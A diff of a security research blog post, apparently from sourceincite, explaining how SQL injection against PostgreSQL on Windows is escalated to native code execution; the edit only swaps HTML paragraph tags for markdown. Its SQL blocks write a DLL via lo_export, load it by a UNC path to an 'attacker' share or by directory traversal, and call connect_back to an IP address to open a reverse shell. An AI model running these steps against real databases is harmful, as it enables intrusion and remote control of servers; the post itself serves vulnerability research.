sourceincite/sourceincite.github.io/_posts/0000-00-00-sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.md

 ...
 ```

-<p class="cn" markdown="1">It maybe possible to skip stage 1 (and only performing a single statement execution for stage 2) by using [object identifier types](https://www.postgresql.org/docs/8.1/datatype-oid.html) within PostgreSQL, but I have not had the time to confirm this.</p>
+It maybe possible to skip stage 1 (and only performing a single statement execution for stage 2) by using [object identifier types](https://www.postgresql.org/docs/8.1/datatype-oid.html) within PostgreSQL, but I have not had the time to confirm this.

-<p class="cn" markdown="1">**Stage 3 -** Now we can write our binary into the data directory.
-Remember, we can't use traversals here since that is checked, but even if we could, strict file permissions for the NETWORK_SERVICE account exist and we have limited options.</p>
+**Stage 3 -** Now we can write our binary into the data directory.
+Remember, we can't use traversals here since that is checked, but even if we could, strict file permissions for the NETWORK_SERVICE account exist and we have limited options.

 ```sql
 select lo_export(1337, 'poc.dll');
 ```

-<p class="cn" markdown="1">**Stage 4 -** Now, let's trigger the loading of the library.</p>
+**Stage 4 -** Now, let's trigger the loading of the library.

-<p class="cn" markdown="1">I demonstrated in a class I taught a few years back that you can use fixed paths (including UNC) to load extensions against PostgreSQL version 9.x, thus gaining native code execution. [@zerosum0x0](https://twitter.com/zerosum0x0) [demonstrated this](https://zerosum0x0.blogspot.com/2016/06/windows-dll-to-shell-postgres-servers.html) by using the file write technique with a fixed path on the filesystem.
-But back then, permissions on the filesystem were not as restrictive.</p>
+I demonstrated in a class I taught a few years back that you can use fixed paths (including UNC) to load extensions against PostgreSQL version 9.x, thus gaining native code execution. [@zerosum0x0](https://twitter.com/zerosum0x0) [demonstrated this](https://zerosum0x0.blogspot.com/2016/06/windows-dll-to-shell-postgres-servers.html) by using the file write technique with a fixed path on the filesystem.
+But back then, permissions on the filesystem were not as restrictive.

 ```sql
 create function connect_back(text, integer) returns void as '//attacker/share/poc.dll', 'connect_back' language C strict;
 ```

-<p class="cn" markdown="1">However, a few years passed and the PostgreSQL developers decided to block fixed paths and alas, that technique is now dead.
+However, a few years passed and the PostgreSQL developers decided to block fixed paths and alas, that technique is now dead.
 But we can simply traverse from the lib directory and load our extension!
-The underlying code of the `create function` appends the `.dll` string, so don't worry about appending it:</p>
+The underlying code of the `create function` appends the `.dll` string, so don't worry about appending it:

 ```sql
 create function connect_back(text, integer) returns void as '../data/poc', 'connect_back' language C strict;
 ```

-<p class="cn" markdown="1">**Stage 5 -** Trigger your reverse shell.</p>
+**Stage 5 -** Trigger your reverse shell.

 ```sql
 select connect_back('192.168.100.54', 1234);